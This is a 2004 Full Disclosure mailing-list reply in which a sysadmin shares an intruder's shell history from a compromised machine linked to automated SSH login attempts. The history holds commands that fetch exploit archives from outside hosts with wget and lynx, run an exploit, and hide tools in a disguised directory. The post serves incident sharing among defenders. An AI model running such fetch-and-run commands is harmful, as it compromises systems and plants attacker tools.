Home page logo

fulldisclosure logo Full Disclosure mailing list archives

Re: Re: Automated SSH login attempts?
From: andrewg () felinemenace org
Date: Fri, 30 Jul 2004 06:36:02 -0700

Greetings list,

Accidentially sent only to Stefan, so redoing it.

On Thu, Jul 29, 2004 at 06:38:15PM +0200, Stefan Janecek wrote:
Hmmm - I have also been getting those login attemps, but thought them to
be harmless. Maybe they are not *that* harmless, though... Today I
managed to get my hands on a machine that was originating such login
attempts. I must admit I am far from being a linux security expert, but
this is what I've found out up to now:

I got a similar experience from a game box I look after 
(void.labs.pulltheplug.com, but people may prefer
http://vortex.labs.pulltheplug.com, feel free to jump on the irc server @ 
irc.pulltheplug.com, #social or #vortex).

The .bash_history is as follows:

uname -a
cat /etc/issue
wget sh3ll.info/milenium/xpl.tgz;tar zxvf xpl.tgz;cd super;./prt
ftp ftp.sh3ll.info
lynx www.sh3ll.info/milenium/xpl.tgz
ls -alF
tar zxv xpl.tgz
tar zxvf xpl.tgz
cd supe`
cd super
lynx mil3nium.go.ro/milenium
lynx mil3nium.go.ro/
lynx sh3ll.info/milenium/milenium
ls -alF
ps -aux |grep test
lynx sh3ll.info/milenium/psy1985.tgz
mkdir .drivers
mv psy1985.tgz .drivers
cd .drivers
tar zxvf psy1985.tgz
rm -rf psy1985.tgz
cd nsmail/
inetd -e -o

It would appear that if they can't get a local root, they'll use the box for
IRCing from.

Hopefully this helps someone. I haven't looked too much into this, if wanted
I could grab the source ip addresses used for logging into guest, but thats
probably not overly useful.

Andrew Griffiths

Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]